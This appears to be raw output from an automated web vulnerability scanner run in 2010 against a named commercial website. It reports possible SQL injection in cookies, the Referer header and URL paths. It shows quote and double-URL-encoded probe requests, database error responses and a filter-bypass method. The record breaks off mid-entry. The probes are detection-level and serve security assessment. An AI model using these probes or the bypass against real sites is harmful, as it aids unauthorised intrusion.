GET /resources''/90-analytics-toolbar.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:06:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/90-analytics-toolbar.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:51:06 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/90-analytics-toolbar.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:51:07 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /resources/90-analytics-toolbar.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb'; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:49:29 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/90-analytics-toolbar.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb''; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:49:30 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=a3804ffbe903c78c6487a5b7719cc07c; path=/ Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:49:31 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:49:32 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28968
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/campaign-url-builder.html%2527 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 04:44:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/campaign-url-builder.html%2527%2527 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 04:44:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:44:16 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:44:16 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20648
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /resources/campaign-url-builder.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:50:49 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/campaign-url-builder.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:50:50 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:50:52 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:50:52 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20619
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the optimizelyBuckets cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/campaign-url-builder.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:59:12 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/campaign-url-builder.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D%2527%2527; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:59:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:59:14 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:59:15 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20620
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /resources/feeds.html' HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 08:06:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:06:14 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:06:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19084
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/feeds.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:04:48 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q=%2527%2527 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:04:49 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:04:52 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:04:52 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18939
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /resources/feeds.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:33:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/feeds.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:33:25 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:33:26 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:33:26 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18923
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The ki_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/feeds.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:00:07 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
